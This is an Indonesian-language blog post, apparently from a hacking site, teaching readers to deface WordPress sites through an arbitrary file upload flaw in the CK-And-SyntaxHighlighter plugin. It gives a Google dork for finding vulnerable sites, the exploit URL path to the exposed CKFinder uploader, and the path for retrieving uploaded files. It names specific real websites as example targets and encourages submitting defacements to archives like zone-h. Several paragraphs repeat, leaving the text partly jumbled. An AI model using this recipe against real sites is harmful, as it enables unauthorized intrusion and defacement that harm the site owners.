Gantengers - WordPress CK-And-SyntaxHighLighter Arbitrary File Upload , Mari kita sedikit bermain-main dengan wordpress dengan berbagai bug yang tersedia kini anda bisa menguploud file berupa gambar atau file text ke dalam website berbasis wordpress tutorial kali ini hampir mirip seperti tutorial sebelumnya hanya berbeda karena tutorial sebelumnya anda bisa menguploud shell kedalam website yang memiliki bug dari plugin mereka sendiri dan kini kita bermain simple saja mungkin tutorial kali ini bisa anda manfaatkan untuk menambah list lagi kedalam web defacement directory yang sudah banyak digandrungi oleh beberapa defacer ternama seperti zone-h dark-h dan lain sebagainya.
Berbeda dengan tutorial yang saya berikan kemarin deface wordpress dengan wp-store remote file uploud vulnerablity tutorial itu mungkin sudah banyak yang menggunakan nya khususnya adalah dork, kenapa karena semakin banyak yang menggunakan dork tersebut semakin kecil harapan kita menemukan target yang fresh ya bukan berarti tidak mungkin anda tidak akan menemukan target tapi kesempatan masih ada untuk tutorial kali ini berikut beberapa paparan mudah tutorial CK-And-SyntaxHighlighter.
2. disitu kita udah buka semua web nya sekarang saya pilih salah satu contoh saya mendapat http://www.tourgueniev.fr/ dan masukan exploit di belakang web tersebut dan akan menjadi http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
Nah Sekarang gunakan imajinasimu dan mulai mencari file untuk mengupload file text atau html.
4. Terakhir untuk mengakses file yang sudah lo uploud silahkan ganti url bagian belakang menjadi http://www.korban.com/wp-content/uploads/ckfinder/files/x.txt
Catatan
www.korban.com ganti dengan url web yang kamu dapatkan
x.txt ganti dengan nama file yang kamu uploud contoh gambar.jpg atau tulisan.txt
Berikut adalah Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload mungkin bisa menambah pengetahuan anda di bidang it dan belajar menemukan bug di web yang anda kelola dengan memperhatikan beberapa artikel saya disini. dan jika masih kurang jelas terhadap tutorial yang saya berikan atau mau menyanggah silahkan tuliskan keluh kesah anda di kotak komentar di bagian akhir posting sekian dan terima kasih.
Berbeda dengan tutorial yang saya berikan kemarin deface wordpress dengan wp-store remote file uploud vulnerablity tutorial itu mungkin sudah banyak yang menggunakan nya khususnya adalah dork, kenapa karena semakin banyak yang menggunakan dork tersebut semakin kecil harapan kita menemukan target yang fresh ya bukan berarti tidak mungkin anda tidak akan menemukan target tapi kesempatan masih ada untuk tutorial kali ini berikut beberapa paparan mudah tutorial CK-And-SyntaxHighlighter.
WordPress CK-And-SyntaxHighLighter Arbitrary File Upload
Bahan-Bahan nyaGoogle Dork
: inurl:/wp-content/plugins/ck-and-syntaxhighlighter/Exploit :
/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.htmlContoh Penggunaan Exploit :
http:///www.korban.com/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.htmlFile Upload Path :
http://www.korban.com/wp-content/uploads/ckfinder/files/x.txtContoh Target :
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
Tutorial Step by Step
1. Silahkan searh di google menggunaka google dork diatas seperti gambar dibawah ini lalu buka semua web yang muncul haha liatin satu satu2. disitu kita udah buka semua web nya sekarang saya pilih salah satu contoh saya mendapat http://www.tourgueniev.fr/ dan masukan exploit di belakang web tersebut dan akan menjadi http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
Nah Sekarang gunakan imajinasimu dan mulai mencari file untuk mengupload file text atau html.
4. Terakhir untuk mengakses file yang sudah lo uploud silahkan ganti url bagian belakang menjadi http://www.korban.com/wp-content/uploads/ckfinder/files/x.txt
Catatan
www.korban.com ganti dengan url web yang kamu dapatkan
x.txt ganti dengan nama file yang kamu uploud contoh gambar.jpg atau tulisan.txt
Berikut adalah Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload mungkin bisa menambah pengetahuan anda di bidang it dan belajar menemukan bug di web yang anda kelola dengan memperhatikan beberapa artikel saya disini. dan jika masih kurang jelas terhadap tutorial yang saya berikan atau mau menyanggah silahkan tuliskan keluh kesah anda di kotak komentar di bagian akhir posting sekian dan terima kasih.
0 Komentar untuk "Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload"